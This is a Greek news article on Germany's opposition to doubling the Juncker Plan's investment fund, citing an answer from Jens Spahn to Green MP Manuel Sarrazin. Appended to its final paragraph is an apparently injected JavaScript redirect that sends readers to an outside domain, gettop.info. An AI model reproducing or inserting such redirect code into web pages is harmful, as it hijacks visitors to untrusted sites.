Αντίθετο το Βερολίνο στον διπλασιασμό του ποσού χρηματοδότησης στο Σχέδιο Γιούνκερ

0
6

 

Την έντονη αντίθεσή της εκφράζει η Γερμανία στην επιθυμία του προέδρου της Κομισιόν Ζαν Κλοντ Γούνκερ για διπλασιασμό του ποσού χρηματοδότησης που διατίθεται μέσω του Σχεδίου Γιούνκερ, σύμφωνα με την εφημερίδα Der Tagesspiegel.

Το Ευρωπαϊκό Ταμείο Στρατηγικών Επενδύσεων (ΕΤΣΕ) δημιουργήθηκε το 2015 για να χρηματοδοτηθούν ενεργειακά, ψηφιακά και επενδυτικά προγράμματα και διαθέτει πόρους που ανέρχονται στα 315 δισ. ευρώ για μία τριετία και πλέον ο Γιούνκερ επιθυμεί να διπλασιάσει αυτό το ποσό στα 630 δισ. ευρώ.

Όμως δεν συμφωνούν όλα τα κράτη μέλη της Ενωσης ότι το εγχείρημα του ΕΤΣΕ έχει μέχρι στιγμής στεφθεί με επιτυχία και η Γερμανία εκφράζει την αντίθεσή της, σημειώνει η γερμανική εφημερίδα.

Σε απάντηση σε έγγραφη ερώτηση του βουλευτή των Πράσινων Μάνουελ Σαραζίν, ο Γενς Σπαν (Χριστιανοδημοκράτης) αναπληρωτής υπουργός Οικονομικών της Γερμανίας δηλώνει ότι μια αύξηση στο ύψος του ήδη συμφωνηθέντος ποσού δεν είναι απαραίτητη.

Ο Σαραζίν, που είναι εκπρόσωπος των Πρασίνων αρμόδιος για Ευρωπαϊκές Υποθέσεις, ήθελε επίσης να μάθει τη θέση του Βερολίνου σχετικά με την πρόταση της Κομισιόν να παραταθεί η αρχική διάρκεια ζωής του Σχεδίου Γιούνκερ από τα τρία χρόνια στα έξι, ένα μέτρο το οποίο θα πρέπει να υιοθετηθεί στη σύνοδο κορυφής της ΕΕ τον Δεκέμβριο.

Σύμφωνα με τα στοιχεία της Ευρωπαϊκής Τράπεζας Επενδύσεων, έως τον Ιούνιο του 2016 μέσω του Σχεδίου Γιούνκερ έχουν χρηματοδοτηθεί προγράμματα σε όλη την Ευρώπη ύψους 105 δισ. ευρώ, όμως υπάρχουν επικρίσεις ότι έχει επικεντρωθεί πάρα πολύ στα πλούσια κράτη μέλη, κάτι που η Κομισιόν επιθυμεί να διορθώσει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here